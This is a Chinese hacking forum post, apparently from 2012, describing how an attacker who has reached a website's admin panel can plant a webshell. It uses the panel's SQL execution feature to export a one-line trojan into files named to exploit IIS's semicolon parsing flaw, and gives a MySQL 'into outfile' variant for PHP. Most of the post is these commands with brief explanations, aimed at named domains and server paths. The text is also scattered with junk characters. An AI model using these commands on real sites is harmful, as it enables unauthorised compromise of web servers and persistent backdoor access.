好不容易进了后台,发现啥上传啊。备份啊多木有。
. J' H3 U' f/ {# [% M; Vwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
' f; m. g" i& Q, d1 [; p$ c文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
6 f/ c9 v5 v% a* l4 @7 P然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
1 F6 c) Y+ e' p) N4 ` I: W# a1.create table cmd (a varchar(50))' g9 J9 z2 K0 B0 q
2.insert into cmd (a) values (‘‘)5 b: w" y( M( i3 \
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd4 o! b* Z- n; c
(把表cmd的内容导出为物理路径的一个EXCEL文件)$ J2 [7 C3 T) x
4.drop table cmd
1 j: l% |% Y% O# [& g利用IIS的BUG成功拿到了WEBSHELL。8 k" Z! i' N! y7 k* O' [
) p1 ]* y" w- l3 ^1 d: r
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
7 }) B# B5 ]0 f6 w+ P- m E0 {( ?' d
SQL语句意思解释:" i& h3 k+ ?3 {" M
第一句
1 s7 k7 _0 Q; O 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
* [9 p1 b* u1 s* s$ o4 ~& N
8 e) D' i7 a5 E2 `/ d7 j f7 y 第二句
; P4 B' @( y2 L, s 在表cmd的a字段插入一句话木马
: s$ M! h5 {; Y2 |' {' y 第三句
* q# J3 |2 j+ c/ q 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
# ~; B. ?! }6 }9 ~ K( |
& K1 I3 j' u- b E+ o- G! G 第四句
; N$ `* x8 R5 e4 s2 t 删除建立的cmd表
# s) M: D: T+ v. H) o
& m" k# }3 p) v 以下内容为测试:
; @3 P: D/ h3 @) l Access利用后台SQL执行命令功能导出WebShell:
0 w$ {3 t' Q1 o( t3 W( g 这个更简单:
+ \% A" p1 v% _. p% ~ [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
' { X& U) H1 [6 q5 M0 R0 ` 或者
) q2 q$ ^! Y; x2 F2 j [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]9 {" _: [" G" t. F
7 @4 {1 b. \+ i7 P' X/ u5 y* T' C
后台有执行SQL语句功能(vote为已知表段)) S$ N0 t! r: N; w& Q
希望对大家有所帮助拿shell的又一个思路' a9 n' `- B/ V. p
|
发表于 2012-9-13 17:53:58
收藏
支持
反对